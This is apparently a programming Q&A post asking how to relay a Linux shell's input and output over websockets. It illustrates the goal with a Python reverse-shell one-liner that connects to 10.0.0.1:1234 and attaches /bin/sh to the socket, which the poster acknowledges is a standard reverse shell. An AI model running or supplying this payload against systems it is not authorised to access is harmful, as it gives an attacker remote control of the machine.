# Python shell over websockets

Tags: python, python-3.x, websocket

I am trying to create a server in python that can handle linux system I/O.

I want it to function in a similar way to the following:

```
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
```

The code above redirects IN OUT and ERR over a standard socket, however I want to do something **similar** over websockets.

Could anyone suggest the best way to do this?

Comment: What have you tried so far (except of copying some code from an other question)?

Comment: @KlausD. This is a standard reverse shell not copy pasted to try and use but rather just to bring context the desired result. The only thing I have managed to do so far is send standard script results over websocket.. run process, collect results, send to websocket. Though I am looking at pty and subprocess in order to maintain a tty session/stream